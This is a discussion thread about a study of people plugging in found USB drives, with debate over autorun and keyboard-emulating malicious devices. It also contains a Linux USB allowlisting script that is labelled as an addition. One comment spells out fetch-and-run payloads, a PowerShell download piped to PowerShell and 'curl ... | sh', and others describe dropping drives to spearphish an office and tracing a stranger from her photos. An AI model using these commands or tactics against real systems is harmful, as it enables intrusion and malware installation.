A Lot of People Carelessly Plug In Random USB Drives Into Their Computers (vice.com)
An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.
Never know what STDs are there, but YOLO
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
You pretty much need to disable it yourself, which means you need to know to do it.
Microsoft still treats auto-run like it's not a terrible idea.
It's actually kind of scary that anybody would keep doing that.
As far as I can see, Windows still excitedly runs anything it sees.
Lost at C:>. Found at C.
1) Given: People will take a random USB stick and plug it into a computer.
2) Conclusion: Only a moron will design an operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The minimal convenience of having auto-run for USB drives is far overridden by the huge security leak.
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
excitingthingstodo.blogspot.com
There is a scene in Mr. Robot where a girl dumps a bunch of infected USB sticks in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.
I feel sorry for people that don't drink, because when they get up in the morning, that's as good as they're gonna feel
I turned off autorun on any external media a long time ago, back when Sony CDs were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP
This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that don't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.
In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst Pavlov training ever.
So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps more so the companies employing the engineers.
That's why we have USB authorization. Since 2007.
What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?
Oh right, Windows. Well, there's your problem.
-Forrest Cameranesi, Geek of all Trades
"I am Sam. Sam I am. I do not like trolls, flames, or spam."
First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)
Then Windows started prompting the user before auto-run from CD drives also.
So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.
A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.
Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.
As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.
The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.
No good deed goes unpunished...
You can buy USB drives in bulk for under a buck a piece, they don't need to be high-capacity, a 128MB drive can hold a shitload of malware. $5 might be a bit on the expensive side to infect a random machine that may not even be your target, but $75 to infect 100 machines is cheap for a targeted attack.
APK quotes people (including myself) without context and should not be trusted. Just thought you should know.
No, the people are NOT stupid.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.
Table-ized A.I.
Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?
Socialism: a lie told by totalitarians and believed by fools.
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to find one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.
It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.
Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.
Irony: Agile development has too much inertia to be abandoned now.
So buy the small drive and print 64GB on the outside.
Nullius in verba
OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"
True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.
A partial solution would be to display a message and give the user 90 seconds to respond.
"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."
Table-ized A.I.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
"First they came for the slanderers and i said nothing."
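The "USB authorization" mentioned earlier in the thread and the "it claims to be a keyboard, is this correct?" proposals above can be combined on Linux. This is an added example, not code from any poster: it default-denies new USB devices through the kernel's sysfs authorization attributes, reads the interface classes a not-yet-authorized device claims from its raw descriptors, and only authorizes allowlisted vendor:product ids. It assumes a Linux host with root access; the allowlist ids and the fake keyboard device tree are constructed sample values so the logic can be exercised offline.

```shell
# Added example, not code from the thread: default-deny USB policy on top of the Linux kernel's
# USB authorization sysfs attributes (authorized_default per root hub, authorized per device).
# 'descriptors' is readable before a device is authorized, so claimed interface classes can be checked first.
ALLOWLIST="046d:c52b 0781:5583"   # approved vendor:product ids (constructed sample values)

# Print bInterfaceClass (hex) of each interface descriptor (type 4) found in 'descriptors'.
usb_claimed_classes() {
    set -- $(od -An -v -tu1 "$1/descriptors")    # one decimal byte per positional parameter
    while [ $# -ge 2 ] && [ "$1" -ge 2 ] && [ $# -ge "$1" ]; do
        [ "$2" -eq 4 ] && [ "$1" -ge 6 ] && printf '%02x\n' "$6"   # byte 5 = bInterfaceClass
        shift "$1"
    done
}

# Decide per device: allow known ids; otherwise deny, flagging anything that claims HID (03).
usb_policy() {
    id="$(cat "$1/idVendor"):$(cat "$1/idProduct")"
    for ok in $ALLOWLIST; do
        [ "$ok" = "$id" ] && { echo allow; return 0; }
    done
    if usb_claimed_classes "$1" | grep -qx 03; then echo deny-hid; else echo deny; fi
}

# Write the decision into the kernel's per-device 'authorized' attribute (1 = allow).
usb_apply() {
    case "$(usb_policy "$1")" in
        allow) echo 1 > "$1/authorized" ;;
        *)     echo 0 > "$1/authorized" ;;
    esac
}

# Default-deny new devices on every root hub, then re-evaluate whatever is already plugged in.
usb_lockdown() {
    sysfs="${1:-/sys/bus/usb/devices}"
    for hub in "$sysfs"/usb*; do
        [ -f "$hub/authorized_default" ] && echo 0 > "$hub/authorized_default"
    done
    for dev in "$sysfs"/[0-9]*-*; do
        [ -f "$dev/idVendor" ] && usb_apply "$dev"   # interface dirs (1-3:1.0) have no idVendor
    done
    return 0
}

# Construct a fake sysfs device dir (composite HID keyboard at 1234:5678) for offline testing.
usb_fake_keyboard() {
    mkdir -p "$1"; printf 1234 > "$1/idVendor"; printf 5678 > "$1/idProduct"; echo 1 > "$1/authorized"
    printf '\022\001\000\002\000\000\000\010\064\022\170\126\000\001\001\002\000\001' > "$1/descriptors"   # device
    printf '\011\002\042\000\001\001\000\200\062\011\004\000\000\001\003\001\001\000' >> "$1/descriptors"  # config + interface (class 03)
    printf '\011\041\021\001\000\001\042\077\000\007\005\201\003\010\000\012' >> "$1/descriptors"          # HID + endpoint
}
```

Run `usb_lockdown` as root to apply it to the live tree; a real deployment would keep the allowlist in a file and hook the policy from a udev rule rather than from a one-shot script.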
Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?
The problem isn't that you can run harmful code off a storage device, that's a known problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.
As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.
That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.
At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.
Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.
You put 10 spread around the parking lot with the name/logo of the company, or a competitor (or try both and see which hits best), and someone will "be nice" and try to see whose it is to return it, or something like that. The real reason scams don't work as well as they should is that scammers prey on the weak (419 scams), rather than preying on the good people.
And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.
Learn to love Alaska
There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:
Win+R powershell -command 'Invoke-WebRequest http...
Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to PowerShell. PowerShell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. PowerShell is that on steroids (and on crack).
Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".
The Linux/Unix/Mac version is similar:
curl http://tinyurl.com/hacker | sh
Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.
That was some epically beautiful nerdiness right there.